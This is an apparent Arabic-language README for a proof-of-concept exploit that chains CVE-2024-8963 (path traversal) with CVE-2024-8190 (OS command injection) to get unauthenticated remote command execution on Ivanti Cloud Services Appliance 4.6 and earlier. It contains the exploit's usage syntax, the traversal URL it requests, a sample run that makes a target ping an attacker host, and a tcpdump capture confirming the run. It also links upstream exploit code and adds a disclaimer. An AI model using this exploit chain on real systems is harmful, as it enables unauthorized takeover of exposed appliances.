
الجمع بين CVE-2024-8963 و CVE-2024-8190 - من أجل RCE غير مُوثَّق على Ivanti CSA 4.6 وما دونها
دمج CVE-2024-8963 & CVE-2024-8190 - إثبات المفهوم (PoC) لتنفيذ الأوامر عن بعد (RCE) بدون مصادقة على Ivanti CSA 4.6 والإصدارات الأقل.
CVE-2024-8963
ثغرة اجتياز المسار (Path Traversal) في Ivanti CSA قبل الإصدار 4.6 Patch 519 تسمح لمهاجم عن بعد غير مصادق عليه بالوصول إلى وظائف مقيدة.
CVE-2024-8190
ثغرة حقن أوامر نظام التشغيل (OS command injection) في Ivanti Cloud Services Appliance الإصدارات 4.6 Patch 518 وما قبل تسمح لمهاجم عن بعد مصادق عليه بالحصول على تنفيذ الأوامر عن بعد. يجب أن يتمتع المهاجم بامتيازات مستوى المسؤول لاستغلال هذه الثغرة.
يجمع إثبات المفهوم هذا بين الثغرتين لتوضيح كيف يمكن استخدام CVE-2024-8190 بدون مصادقة.
python3 ./cve-2024-8190.py <target_url> '<CMD>'
$ python3 ./cve-2024-8190.py https://<target> 'ping -c 4 <attacker>'
[!] WARNING: This script is for authorized testing and educational purposes only. Unauthorized use is illegal.
[*] Fetching https://<target>/client/index.php%3F.php/gsb/datetime.php...
[+] Got LDCSA_CSRF value: sid:483045<REMOVED>
[*] Sending payload...
[!] Request timed out. Check if the command executed on the target.
$ sudo tcpdump -n "icmp" -l
11:43:15.135004 IP <target> > <attacker> ICMP echo request, id 30001, seq 1, length 64
11:43:16.135647 IP <target> > <attacker>: ICMP echo request, id 30001, seq 2, length 64
11:43:17.137707 IP <target> > <attacker>: ICMP echo request, id 30001, seq 3, length 64
11:43:18.137085 IP <target> > <attacker>: ICMP echo request, id 30001, seq 4, length 64
إثبات المفهوم لـ CVE-2024-8190 من Horizon3.ai الذي تم بناء هذا العمل عليه بشكل كبير:
https://github.com/horizon3ai/CVE-2024-8190
قالب nuclei من ProjectDiscovery لـ CVE-2024-8963.yaml:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-8963.yaml
ملاحظة: ProjectDiscovery رائعة!
لا تكن أحمقاً.
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود استخدامه لمهاجمة الأنظمة إلا في حالة التصريح بذلك صراحة. القائمون على المشروع غير مسؤولين عن إساءة استخدام البرنامج. استخدمه بمسؤولية.